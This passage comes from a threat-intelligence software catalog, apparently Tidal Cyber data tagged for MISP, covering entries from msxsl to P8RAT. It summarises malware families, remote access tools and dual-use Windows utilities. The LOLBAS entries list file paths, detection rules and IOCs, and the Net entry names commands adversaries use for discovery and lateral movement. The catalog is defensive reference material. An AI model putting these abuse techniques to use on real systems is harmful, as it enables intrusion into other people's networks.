This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Command line utility used to perform XSL transformations.

Author: Oddvar Moe

Paths: * no default

The tag is: misp-galaxy:software="msxsl"

MURKYTOP

The tag is: misp-galaxy:software="MURKYTOP"

Mythic

[Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) is designed to "plug-n-play" with various agents and communication channels.<sup>[[Mythic Github](https://app.tidalcyber.com/references/20d0adf0-b832-4b03-995e-dfb56474ddcc)]</sup><sup>[[Mythic SpecterOps](https://app.tidalcyber.com/references/98d4453e-2e80-422a-ac8c-47f650f46e3c)]</sup><sup>[[Mythc Documentation](https://app.tidalcyber.com/references/de3091b4-663e-4d9e-9dde-51250749863d)]</sup> Deployed [Mythic](https://app.tidalcyber.com/software/f1398367-a0af-4a89-b240-50cae4985ed9) C2 servers have been observed as part of potentially malicious infrastructure.<sup>[[RecordedFuture 2021 Ad Infra](https://app.tidalcyber.com/references/d509e6f2-c317-4483-a51e-ad15a78a12c0)]</sup>

The tag is: misp-galaxy:software="Mythic"

Naid

The tag is: misp-galaxy:software="Naid"

NanHaiShu

[NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) is a remote access tool and JScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). [NanHaiShu](https://app.tidalcyber.com/software/0e28dfc9-8948-4c08-b7d8-9e80e19cc464) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. <sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup> <sup>[[fsecure NanHaiShu July 2016](https://app.tidalcyber.com/references/41984650-a0ac-4445-80b6-7ceaf93bd135)]</sup>

The tag is: misp-galaxy:software="NanHaiShu"

NanoCore

[NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1) is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.<sup>[[DigiTrust NanoCore Jan 2017](https://app.tidalcyber.com/references/6abac972-bbd0-4cd2-b3a7-25e7825ac134)]</sup><sup>[[Cofense NanoCore Mar 2018](https://app.tidalcyber.com/references/de31ba54-5634-48c5-aa57-c6b0dbb53870)]</sup><sup>[[PaloAlto NanoCore Feb 2016](https://app.tidalcyber.com/references/caa0a421-04b0-4ebc-b365-97082d69d33d)]</sup><sup>[[Unit 42 Gorgon Group Aug 2018](https://app.tidalcyber.com/references/d0605185-3f8d-4846-a718-15572714e15b)]</sup>

The tag is: misp-galaxy:software="NanoCore"

NativeZone

The tag is: misp-galaxy:software="NativeZone"

NavRAT

[NavRAT](https://app.tidalcyber.com/software/b410d30c-4db6-4239-950e-9b0e0521f0d2) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. <sup>[[Talos NavRAT May 2018](https://app.tidalcyber.com/references/f644ac27-a923-489b-944e-1ba89c609307)]</sup>

The tag is: misp-galaxy:software="NavRAT"

NBTscan

[NBTscan](https://app.tidalcyber.com/software/950f13e6-3ae3-411e-a2b2-4ba1afe6cb76) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.<sup>[[Debian nbtscan Nov 2019](https://app.tidalcyber.com/references/8d718be1-9695-4e61-a922-5162d88477c0)]</sup><sup>[[SecTools nbtscan June 2003](https://app.tidalcyber.com/references/505c9e8b-66e0-435c-835f-b4405ba91966)]</sup><sup>[[Symantec Waterbug Jun 2019](https://app.tidalcyber.com/references/ddd5c2c9-7126-4b89-b415-dc651a2ccc0e)]</sup><sup>[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)]</sup>

The tag is: misp-galaxy:software="NBTscan"

nbtstat

[nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e) is a utility used to troubleshoot NetBIOS name resolution. <sup>[[TechNet Nbtstat](https://app.tidalcyber.com/references/1b1e6b08-fc2a-48f7-82bd-e3c1a7a0d97e)]</sup>

The tag is: misp-galaxy:software="nbtstat"

NDiskMonitor

[NDiskMonitor](https://app.tidalcyber.com/software/6d42e6c5-3056-4ff1-8d5d-a736807ec84c) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a). <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="NDiskMonitor"

Nebulae

The tag is: misp-galaxy:software="Nebulae"

Neoichor

[Neoichor](https://app.tidalcyber.com/software/8662e29e-5766-4311-894e-5ca52515ccbe) is C2 malware used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) since at least 2019; similar malware families used by the group include Leeson and Numbldea.<sup>[[Microsoft NICKEL December 2021](https://app.tidalcyber.com/references/29a46bb3-f514-4554-ad9c-35f9a5ad9870)]</sup>

The tag is: misp-galaxy:software="Neoichor"

Nerex

The tag is: misp-galaxy:software="Nerex"

net.exe - Associated Software

The tag is: misp-galaxy:software="net.exe - Associated Software"

Net

The [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. <sup>[[Microsoft Net Utility](https://app.tidalcyber.com/references/75998d1c-69c0-40d2-a64b-43ad8efa05da)]</sup>

[Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) has a great deal of functionality, <sup>[[Savill 1999](https://app.tidalcyber.com/references/e814d4a5-b846-4d68-ac00-7021238d287a)]</sup> much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) using <code>net use</code> commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as <code>net1 user</code>.

The tag is: misp-galaxy:software="Net"

NetC - Associated Software

The tag is: misp-galaxy:software="NetC - Associated Software"

Net Crawler

[Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759) is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) to execute a copy of [Net Crawler](https://app.tidalcyber.com/software/947c6212-4da8-48dd-9da9-ce4b077dd759). <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>

The tag is: misp-galaxy:software="Net Crawler"

NETEAGLE

[NETEAGLE](https://app.tidalcyber.com/software/852c300d-9313-442d-9b49-9883522c3f4b) is a backdoor developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) with compile dates as early as 2008. It has two main variants known as “Scout” and “Norton.” <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="NETEAGLE"

netsh.exe - Associated Software

The tag is: misp-galaxy:software="netsh.exe - Associated Software"

netsh

[netsh](https://app.tidalcyber.com/software/803192b8-747b-4108-ae15-2d7481d39162) is a scripting utility used to interact with networking components on local or remote systems. <sup>[[TechNet Netsh](https://app.tidalcyber.com/references/58112a3a-06bd-4a46-8a09-4dba5f42a04f)]</sup>

The tag is: misp-galaxy:software="netsh"

netstat

[netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) is an operating system utility that displays active TCP connections, listening ports, and network statistics. <sup>[[TechNet Netstat](https://app.tidalcyber.com/references/84ac26d8-9c7c-4c8c-bf64-a9fb4578388c)]</sup>

The tag is: misp-galaxy:software="netstat"

NetTraveler

[NetTraveler](https://app.tidalcyber.com/software/1b8f9cf9-db8f-437d-800e-5ddd090fe30d) is malware that has been used in multiple cyber espionage campaigns for basic surveillance of victims. The earliest known samples have timestamps back to 2005, and the largest number of observed samples were created between 2010 and 2013. <sup>[[Kaspersky NetTraveler](https://app.tidalcyber.com/references/a7d4b322-3710-436f-bd51-e5c258073dba)]</sup>

The tag is: misp-galaxy:software="NetTraveler"

Mailto - Associated Software

The tag is: misp-galaxy:software="Mailto - Associated Software"

Koko Ransomware - Associated Software

The tag is: misp-galaxy:software="Koko Ransomware - Associated Software"

Netwalker

[Netwalker](https://app.tidalcyber.com/software/5b4b395f-f61a-4bd6-94c1-fb45ed3cd13d) is fileless ransomware written in PowerShell and executed directly in memory.<sup>[[TrendMicro Netwalker May 2020](https://app.tidalcyber.com/references/ceda9ef6-e609-4a34-9db1-d2a3ebffb679)]</sup>

The tag is: misp-galaxy:software="Netwalker"

NETWIRE

[NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012.<sup>[[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup><sup>[[McAfee Netwire Mar 2015](https://app.tidalcyber.com/references/b02fbf00-f571-4507-941d-ac1d4a8310b0)]</sup><sup>[[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]</sup>

The tag is: misp-galaxy:software="NETWIRE"

ngrok

[ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.<sup>[[Zdnet Ngrok September 2018](https://app.tidalcyber.com/references/3edb88be-2ca6-4925-ba2e-a5a4ac5f9ab0)]</sup><sup>[[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)]</sup><sup>[[Cyware Ngrok May 2019](https://app.tidalcyber.com/references/583a01b6-cb4e-41e7-aade-ac2fd19bda4e)]</sup><sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:software="ngrok"

Backdoor.Nidiran - Associated Software

The tag is: misp-galaxy:software="Backdoor.Nidiran - Associated Software"

Nidiran

[Nidiran](https://app.tidalcyber.com/software/3ae9acd7-39f8-45c6-b557-c7d9a40eed2c) is a custom backdoor developed and used by [Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c). It has been delivered via strategic web compromise. <sup>[[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]</sup>

The tag is: misp-galaxy:software="Nidiran"

NightClub

[NightClub](https://app.tidalcyber.com/software/b1963876-dbdc-5beb-ace3-acb6d7705543) is a modular implant written in C++ that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2014.<sup>[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]</sup>

The tag is: misp-galaxy:software="NightClub"

Njw0rm - Associated Software

Some sources have discussed Njw0rm as a later variant of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f), where Njw0rm adds the ability to spread via removable devices such as USB drives.<sup>[[FireEye Njw0rm Aug 2013](https://app.tidalcyber.com/references/062c31b1-7c1e-487f-8340-11f4b3faabc4)]</sup> Other sources contain that functionality in their description of [njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) itself.<sup>[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]</sup><sup>[[Trend Micro njRAT 2018](https://app.tidalcyber.com/references/d8e7b428-84dd-4d96-b3f3-70e7ed7f8271)]</sup>

The tag is: misp-galaxy:software="Njw0rm - Associated Software"

LV - Associated Software

The tag is: misp-galaxy:software="LV - Associated Software"

Bladabindi - Associated Software

The tag is: misp-galaxy:software="Bladabindi - Associated Software"

njRAT

[njRAT](https://app.tidalcyber.com/software/82996f6f-0575-45cd-8f7c-ba1b063d5b9f) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.<sup>[[Fidelis njRAT June 2013](https://app.tidalcyber.com/references/6c985470-a923-48fd-82c9-9128b6d59bcb)]</sup>

The tag is: misp-galaxy:software="njRAT"

Nltest

[Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.<sup>[[Nltest Manual](https://app.tidalcyber.com/references/4bb113a8-7e2c-4656-86f4-c30b08705ffa)]</sup>

The tag is: misp-galaxy:software="Nltest"

nmap.exe - Associated Software

The tag is: misp-galaxy:software="nmap.exe - Associated Software"

Nmap

According to its project website, "Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing".<sup>[[Nmap: the Network Mapper](/references/65f1bbaa-8ad1-4ad5-b726-660558d27efc)]</sup>

The tag is: misp-galaxy:software="Nmap"

Diskcoder.C - Associated Software

The tag is: misp-galaxy:software="Diskcoder.C - Associated Software"

Petrwrap - Associated Software

The tag is: misp-galaxy:software="Petrwrap - Associated Software"

GoldenEye - Associated Software

The tag is: misp-galaxy:software="GoldenEye - Associated Software"

ExPetr - Associated Software

The tag is: misp-galaxy:software="ExPetr - Associated Software"

Nyetya - Associated Software

The tag is: misp-galaxy:software="Nyetya - Associated Software"

NotPetya

[NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[US-CERT NotPetya 2017](https://app.tidalcyber.com/references/6a009850-834b-4178-9028-2745921b6743)]</sup><sup>[[ESET Telebots June 2017](https://app.tidalcyber.com/references/eb5c2951-b149-4e40-bc5f-b2630213eb8b)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup>

The tag is: misp-galaxy:software="NotPetya"

npcap.exe - Associated Software

The tag is: misp-galaxy:software="npcap.exe - Associated Software"

Npcap

According to its project website, "Npcap is the Nmap Project’s packet capture (and sending) library for Microsoft Windows".<sup>[[Npcap: Windows Packet Capture Library & Driver](/references/c8dc5650-eb37-4bb6-b5b7-e6269c79785c)]</sup> Nmap is a utility used for network discovery and security auditing.

The tag is: misp-galaxy:software="Npcap"

ntdsutil.exe - Associated Software

The tag is: misp-galaxy:software="ntdsutil.exe - Associated Software"

Ntdsutil

Ntdsutil is a Windows command-line tool "that provides management facilities for Active Directory Domain Services (AD DS) and Active Directory Lightweight Directory Services (AD LDS)."<sup>[[Ntdsutil Microsoft](/references/34de2f08-0481-4894-80ef-86506d821cf0)]</sup>

The tag is: misp-galaxy:software="Ntdsutil"

ObliqueRAT

The tag is: misp-galaxy:software="ObliqueRAT"

OceanSalt

[OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://app.tidalcyber.com/software/f1723994-058b-4525-8e11-2f0c80d8f3a4) shares code similarity with [SpyNote RAT](https://app.tidalcyber.com/software/), which has been linked to APT1.<sup>[[McAfee Oceansalt Oct 2018](https://app.tidalcyber.com/references/04b475ab-c7f6-4373-a4b0-04b5d8028f95)]</sup>

The tag is: misp-galaxy:software="OceanSalt"

Octopus

[Octopus](https://app.tidalcyber.com/software/8f04e609-8773-4529-b247-d32f530cc453) is a Windows Trojan written in the Delphi programming language that has been used by [Nomadic Octopus](https://app.tidalcyber.com/groups/5f8c6ee0-f302-403b-b712-f1e3df064c0c) to target government organizations in Central Asia since at least 2014.<sup>[[Securelist Octopus Oct 2018](https://app.tidalcyber.com/references/77407057-53f1-4fde-bc74-00f73d417f7d)]</sup><sup>[[Security Affairs DustSquad Oct 2018](https://app.tidalcyber.com/references/0e6b019c-cf8e-40a7-9e7c-6a7dc5309dc6)]</sup><sup>[[ESET Nomadic Octopus 2018](https://app.tidalcyber.com/references/50dcb3f0-1461-453a-aab9-38c2e259173f)]</sup>

The tag is: misp-galaxy:software="Octopus"

Odbcconf.exe - Associated Software

<sup>[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup>

The tag is: misp-galaxy:software="Odbcconf.exe - Associated Software"

Odbcconf

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used in Windows for managing ODBC connections

Author: Oddvar Moe

Paths:

* C:\Windows\System32\odbcconf.exe
* C:\Windows\SysWOW64\odbcconf.exe

Detection:

* Sigma: [proc_creation_win_odbcconf_response_file.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml)
* Sigma: [proc_creation_win_odbcconf_response_file_susp.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml)
* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)
* Elastic: defense_evasion_network_connection_from_windows_binary.toml<sup>[[LOLBAS Odbcconf](/references/febcaaec-b535-4347-a4c7-b3284b251897)]</sup>

The tag is: misp-galaxy:software="Odbcconf"

OfflineScannerShell.exe - Associated Software

<sup>[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]</sup>

The tag is: misp-galaxy:software="OfflineScannerShell.exe - Associated Software"

OfflineScannerShell

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Defender Offline Shell

Author: Elliot Killick

Paths: * C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe

Resources: None Provided

Detection:

* Sigma: [proc_creation_win_lolbas_offlinescannershell.yml](https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml)
* IOC: OfflineScannerShell.exe should not be run on a normal workstation<sup>[[OfflineScannerShell.exe - LOLBAS Project](/references/8194442f-4f86-438e-bd0c-f4cbda0264b8)]</sup>

The tag is: misp-galaxy:software="OfflineScannerShell"

Okrum

[Okrum](https://app.tidalcyber.com/software/f9bcf0a1-f287-44ec-8f53-6859d41e041c) is a Windows backdoor that has been seen in use since December 2016 with strong links to Ke3chang.<sup>[[ESET Okrum July 2019](https://app.tidalcyber.com/references/197163a8-1a38-4edd-ba73-f44e7a329f41)]</sup>

The tag is: misp-galaxy:software="Okrum"

Sasfis - Associated Software

The tag is: misp-galaxy:software="Sasfis - Associated Software"

Olympic Destroyer

[Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) is malware that was used by [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) against the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware was to render infected computer systems inoperable. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) has worm-like features to spread itself across a computer network in order to maximize its destructive impact.<sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup>

The tag is: misp-galaxy:software="Olympic Destroyer"

OneDriveStandaloneUpdater.exe - Associated Software

<sup>[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]</sup>

The tag is: misp-galaxy:software="OneDriveStandaloneUpdater.exe - Associated Software"

OneDriveStandaloneUpdater

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: OneDrive Standalone Updater

Author: Elliot Killick

Paths: * %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe

Detection:

* IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
* IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
* Sigma: registry_set_lolbin_onedrivestandaloneupdater.yml<sup>[[OneDriveStandaloneUpdater.exe - LOLBAS Project](/references/3d7dcd68-a7b2-438c-95bb-b7523a39c6f7)]</sup>

The tag is: misp-galaxy:software="OneDriveStandaloneUpdater"

OnionDuke

The tag is: misp-galaxy:software="OnionDuke"

OopsIE

[OopsIE](https://app.tidalcyber.com/software/4f1894d4-d085-4348-af50-dfda257a9e18) is a Trojan used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2) to remotely execute commands as well as upload/download files to/from victims. <sup>[[Unit 42 OopsIE! Feb 2018](https://app.tidalcyber.com/references/d4c2bac0-e95c-46af-ae52-c93de3d92f19)]</sup>

The tag is: misp-galaxy:software="OopsIE"

OpenConsole.exe - Associated Software

<sup>[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]</sup>

The tag is: misp-galaxy:software="OpenConsole.exe - Associated Software"

OpenConsole

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Console Window host for Windows Terminal

Author: Nasreddine Bencherchali

Paths:

* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe

Detection:

* IOC: OpenConsole.exe spawning unexpected processes
* Sigma: proc_creation_win_lolbin_openconsole.yml<sup>[[OpenConsole.exe - LOLBAS Project](/references/e597522a-68ac-4d7e-80c4-db1c66d2da04)]</sup>

The tag is: misp-galaxy:software="OpenConsole"

AIRBREAK - Associated Software

The tag is: misp-galaxy:software="AIRBREAK - Associated Software"

Orz

[Orz](https://app.tidalcyber.com/software/45a52a29-00c0-458a-b705-1040e06a43f2) is a custom JavaScript backdoor used by [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. <sup>[[Proofpoint Leviathan Oct 2017](https://app.tidalcyber.com/references/f8c2b67b-c097-4b48-8d95-266a45b7dd4d)]</sup> <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="Orz"

OSInfo

The tag is: misp-galaxy:software="OSInfo"

Backdoor.MacOS.OCEANLOTUS.F - Associated Software

<sup>[[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]</sup>

The tag is: misp-galaxy:software="Backdoor.MacOS.OCEANLOTUS.F - Associated Software"

OSX_OCEANLOTUS.D

[OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) is a macOS backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145). First discovered in 2015, [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) has continued to make improvements using a plugin architecture to extend capabilities, specifically using .dylib files. [OSX_OCEANLOTUS.D](https://app.tidalcyber.com/software/a45904b5-0ada-4567-be4c-947146c7f574) can also determine its permission level and execute according to access type (root or user).<sup>[[Unit42 OceanLotus 2017](https://app.tidalcyber.com/references/fcaf57f1-6696-54a5-a78c-255c8f6ac235)]</sup><sup>[[TrendMicro MacOS April 2018](https://app.tidalcyber.com/references/e18ad1a7-1e7e-4aca-be9b-9ee12b41c147)]</sup><sup>[[Trend Micro MacOS Backdoor November 2020](https://app.tidalcyber.com/references/43726cb8-a169-4594-9323-fad65b9bae97)]</sup>

The tag is: misp-galaxy:software="OSX_OCEANLOTUS.D"

Zshlayer - Associated Software

<sup>[[sentinelone shlayer to zshlayer](https://app.tidalcyber.com/references/17277b12-af29-475a-bc9a-0731bbe0bae2)]</sup>

The tag is: misp-galaxy:software="Zshlayer - Associated Software"

Crossrider - Associated Software

The tag is: misp-galaxy:software="Crossrider - Associated Software"

OSX/Shlayer

[OSX/Shlayer](https://app.tidalcyber.com/software/4d91d625-21d8-484a-b63f-0a3daa4ed434) is a Trojan designed to install adware on macOS that was first discovered in 2018.<sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup><sup>[[Intego Shlayer Feb 2018](https://app.tidalcyber.com/references/46eb883c-e203-4cd9-8f1c-c6ea12bc2742)]</sup>

The tag is: misp-galaxy:software="OSX/Shlayer"

Out1

[Out1](https://app.tidalcyber.com/software/273b1e8d-a23d-4c22-8493-80f3d6639352) is a remote access tool written in Python and used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least 2021.<sup>[[Trend Micro Muddy Water March 2021](https://app.tidalcyber.com/references/16b4b834-2f44-4bac-b810-f92080c41f09)]</sup>

The tag is: misp-galaxy:software="Out1"

OutSteel

[OutSteel](https://app.tidalcyber.com/software/042fe42b-f60e-45e1-b47d-a913e0677976) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://app.tidalcyber.com/groups/407274be-1820-4a84-939e-629313f4de1d) since at least March 2021.<sup>[[Palo Alto Unit 42 OutSteel SaintBot February 2022](https://app.tidalcyber.com/references/b0632490-76be-4018-982d-4b73b3d13881)]</sup>

The tag is: misp-galaxy:software="OutSteel"

OwaAuth

[OwaAuth](https://app.tidalcyber.com/software/6d8a8510-e6f1-49a7-b3a5-bd4664937147) is a Web shell and credential stealer deployed to Microsoft Exchange servers that appears to be exclusively used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5). <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="OwaAuth"

Peer-to-Peer ZeuS - Associated Software

The tag is: misp-galaxy:software="Peer-to-Peer ZeuS - Associated Software"

Gameover ZeuS - Associated Software

The tag is: misp-galaxy:software="Gameover ZeuS - Associated Software"

P2P ZeuS

[P2P ZeuS](https://app.tidalcyber.com/software/916f8a7c-e487-4446-b6ee-c8da712a9569) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. <sup>[[Dell P2P ZeuS](https://app.tidalcyber.com/references/773d1d91-a93c-4bb3-928b-4c3f82f2c889)]</sup>

The tag is: misp-galaxy:software="P2P ZeuS"

HEAVYPOT - Associated Software

The tag is: misp-galaxy:software="HEAVYPOT - Associated Software"

GreetCake - Associated Software

The tag is: misp-galaxy:software="GreetCake - Associated Software"

P8RAT

